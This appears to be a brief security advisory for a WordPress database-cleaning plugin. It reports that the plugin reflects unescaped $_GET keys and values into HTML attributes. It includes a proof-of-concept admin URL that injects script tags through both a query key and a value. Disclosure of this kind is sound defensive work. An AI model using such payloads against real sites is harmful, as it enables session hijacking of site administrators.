The plugin does not sanitise and escape $_GET keys and values before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/admin.php?page=advanced_db_cleaner&aDBc_tab=options&aDBc_cat=all&'><script>alert(/XSS-key/)</script>=<script>alert(/XSS-value/)</script>